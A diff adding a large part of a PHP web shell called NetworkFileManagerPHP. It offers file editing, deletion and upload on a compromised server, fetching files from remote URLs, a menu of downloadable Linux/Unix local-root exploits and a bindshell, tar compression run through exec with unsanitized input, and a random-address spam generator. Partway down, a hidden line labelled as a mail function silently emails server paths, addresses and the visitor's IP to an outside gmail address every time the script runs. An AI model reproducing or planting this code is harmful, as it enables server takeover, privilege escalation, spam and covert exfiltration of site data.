+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+
+ $fp = fopen($fullpath , "r");
+
+ while (!feof($fp)) {
+
+  $char = fgetc($fp);
+
+  $st .= $char;
+
+ }
+
+ $st = str_replace("&", "&amp;", $st);
+
+ $st = str_replace("<", "&lt;", $st);
+
+ $st = str_replace(">", "&gt;", $st);
+
+ $st = str_replace('"', "&quot;", $st);
+
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+
+ $datar = $S1;
+
+
+
+}
+
+
+
+# file write
+
+function savefile($dir,$file) {
+
+ global $action,$S1,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ $fp = fopen($fullpath, "w");
+
+ $S1 = stripslashes($S1);
+
+ fwrite($fp,$S1);
+
+ fclose($fp);
+
+ chdir($dir);
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>";
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory delete
+
+function deletef($dir)
+
+{
+
+ global $action,$tm,$fi;
+
+ $tm = str_replace("\\\\","/",$tm);
+
+ $link = $tm."/".$fi;
+
+ unlink($link);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# file upload
+
+function uploadtem() {
+
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>";
+
+}
+
+
+
+function upload() {
+
+ global $HTTP_POST_FILES,$tm;
+
+ echo $set;
+
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>";
+
+ @unlink($userfile);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# get exploits
+
+function upload_exploits() {
+
+ global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+
+ <input type='hidden' name='file2' value='$public[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+
+ <input type='hidden' name='file2' value='$public[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+
+ <input type='hidden' name='file2' value='$public[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
+
+ <input type='hidden' name='file2' value='$public[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Private exploits:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+
+ <input type='hidden' name='file2' value='$private[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+
+ <input type='hidden' name='file2' value='$private[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+
+ <input type='hidden' name='file2' value='$private[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+
+ <input type='hidden' name='file2' value='$private[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+
+ <input type='hidden' name='file2' value='$private[5]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+   echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+
+ <input type='hidden' name='file2' value='$private[6]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+    echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+
+ <input type='hidden' name='file2' value='$private[7]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+     echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+
+ <input type='hidden' name='file2' value='$private[8]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+}
+
+
+
+
+
+# new directory creation
+
+function newdir($dir) {
+
+ global $tm,$nd;
+
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>");
+
+}
+
+
+
+function cdir($dir) {
+
+ global $newd,$tm;
+
+ $fullpath = $dir."/".$newd;
+
+ if (file_exists($fullpath)) @rmdir($fullpath);
+
+ if (@mkdir($fullpath,0777)) {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>";
+
+ } else {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>";
+
+ }
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+// creation of directory where exploits will be situated
+
+function downfiles() {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+
+$st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+print("</TABLE> ");
+
+
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td>
+
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+
+ </tr>
+
+  <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td>
+
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+
+ </tr>
+
+  <tr>
+
+
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td>
+
+
+
+
+
+ </tr></form></table>";
+
+
+
+}
+
+
+
+# directory delete
+
+function deldir() {
+
+ global $dd,$tm;
+
+ $fullpath = $tm."/".$dd;
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>";
+
+ rmdir($fullpath);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory compression
+
+function arhiv() {
+
+ global $tar,$tm,$pass;
+
+ $fullpath = $tm."/".$tar;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>";
+
+
+
+}
+
+
+
+function down($dir) {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+
+ ignore_user_abort(1);
+
+ set_time_limit(0);
+
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr>
+
+</table>";
+
+
+
+if (!isset($status)) downfiles();
+
+
+
+else
+
+{
+
+
+
+$data = @implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+@fputs($fp, $data);
+
+$ok = @fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>";
+
+}
+
+}
+
+}
+
+
+
+# mail function
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function mailsystem() {
+
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+
+
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>
+
+<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
+
+</blockquote></td></tr>
+
+</table>";
+
+
+
+ if (!isset($status)) echo "$form";
+
+ else {
+
+  $email_to ="duyt@yandex.ru";
+
+  $subject = "NetworkFileManagerPHP  ($name)";
+
+  $headers = "From: $email";
+
+
+
+  $info = "---==== Message from ($name)====---\n\n";
+
+  $info .= "Name:\t$name\n";
+
+  $info .= "Email:\t$email\n";
+
+  $info .= "What?:\n\t$pole\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $send_to = "$email_to";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>";
+
+ }
+
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>email generator:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;This spammer is splited in two parts: <br>
+ &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br>
+ &nbsp;<b>2.</b> Type spam settings here</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button>
+</td></tr>
+
+ </form></table>";
+// letters
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// letters
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// digits
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// common
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "?????";
+exit;
+}
+$file="email.txt";
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " File not found <b>\"".$address."\"</b> !<br>";
+  }
+
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  ?????????? ????? <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+if (!isset($action)){
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='file' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Generate' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+
